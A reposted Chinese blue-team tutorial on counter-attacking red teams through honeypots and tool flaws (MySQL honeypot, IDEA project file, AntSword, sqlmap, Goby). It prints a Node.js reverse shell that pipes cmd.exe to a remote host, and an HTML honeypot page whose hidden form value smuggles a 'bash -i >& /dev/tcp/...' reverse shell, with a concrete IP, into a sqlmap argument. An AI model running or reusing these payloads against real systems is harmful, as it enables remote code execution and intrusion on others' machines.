当前位置: 首页 > article >正文

【蓝队技能】【溯源反制】反打红队-蜜罐工具反制

蓝队技能


反打红队-蜜罐&工具反制

  • 蓝队技能
  • 总结
  • 前言
  • 一、Mysql蜜罐反打
  • 二、源码泄露蜜罐反打
  • 三、蚁剑反打
  • 四、sqlmap反打
  • 五、goby反打


总结

在这里插入图片描述


前言

本文汇总了网络安全攻防中的溯源反制策略,包括MYSQL蜜罐、源码泄漏蜜罐、AntSword反制、SQLMap诱捕及Goby反制。通过实战案例,展示蓝队如何巧妙应对红队攻击,提升防御能力。适合网络安全从业者、渗透测试人员及兴趣爱好者参考。


一、Mysql蜜罐反打

蜜罐地址
python2安装

该蜜罐需要python2启动,在安装过程遇到问题,请看python2安装解决方案

mysql反制核心研究

二、源码泄露蜜罐反打

  1. 创建空文件夹,并使用IDEA打开
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

如下OK应该是第14步
在这里插入图片描述
关闭IDEA,然后重新打开test文件夹,发现运行了计算器

在这里插入图片描述

很容易联想到,如果我有一套源码,按照如上操作方式,把可执行文件放在源码中,是不是可以上线CS了

蜜罐

三、蚁剑反打

前提: 低版本
在这里插入图片描述
在这里插入图片描述

上图的base64编码为如下代码的base64编码

var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(xx, "xx.xx.xx.xx", function()  {client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
  • xx:反弹端口
  • xxxx:反弹IP地址
    在这里插入图片描述
    在这里插入图片描述

四、sqlmap反打

ping "`ls`" : 显示当前目录下的文件
sqlmap -u "http://47.94.xxx.xxx/test.html?id=aaa&b=`XXX`":会执行XXX命令

我们的目的就是让红队使用(sqlmap -u “http://192.168.189.142/1.html?id=aaa&b=bash -i >& /dev/tcp/115.159.72.226/2333 0>&1”)来进行sql注入,然后就是反弹shell到我们指定的服务器,构造的注入页面代码如下:

<!--1.html页面内容 服务器是Linux -->
<html>
<head>
    <meta charset="utf-8">  
    <title> A sqlmap honeypot demo</title>
</head>
<body>
	<input>search the user</input>   <!--创建一个空白表单-->
	<form action="username.html" method="post" enctype="text/plain">
		<!--创建一个隐藏的表单-->
		<input type='hidden' name='name' value="id=aaa&b=`bash -i >& /dev/tcp/115.159.72.226/2333 0>&1`"/>	
		<!--创建一个按钮,提交表单内容-->
		<input type="submit" value='提交'>
	</form>
</body>
</html>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

五、goby反打

goby反打详解

对红队反打比较感兴趣可以看如下文章,总结的非常全
反打大佬文章



http://www.kler.cn/a/382431.html

相关文章:

  • Linux 有名管道
  • 内网项目,maven本地仓库离线打包,解决Cannot access central in offline mode?
  • Multi Agents协作机制设计及实践
  • 数字后端零基础入门系列 | Innovus零基础LAB学习Day9
  • ONLYOFFICE 8.2深度体验:高效协作与卓越性能的完美融合
  • springboot - 定时任务
  • MySQL数据库中的视图
  • 多模态模型中的动态分辨率总结
  • 前端使用PDF.js把返回的base64或二进制文件流格式,实现pdf文件预览
  • 移门减震器-止门时的震动保护门体和墙体
  • 详细分析SQL state [99999]; error code [17059]; 无法转换为内部表示 解决方法(实战讲解)
  • 【LeetCode】【算法】322. 零钱兑换
  • sqli-labs(第一关)
  • 5G学习笔记三之物理层、数据链路层、RRC层协议
  • Flinksql 模拟 视图 监听
  • Python(PySimpleGUI 库)
  • gulp入门教程16:gulp插件gulp-uglify
  • 软件测试学习笔记丨Flask操作数据库-一对多
  • 电商行业企业员工培训的在线知识库构建
  • git常用操作指令
  • oasys系统代码审计
  • mmsegmentation训练自己的数据集
  • java语言基本编程原理
  • 5.Java 数组(一维数组、二维数组、数组实例实操)
  • ubuntu20安装opencv3.2记录
  • 洛谷P1090 [NOIP2004 提高组] 合并果子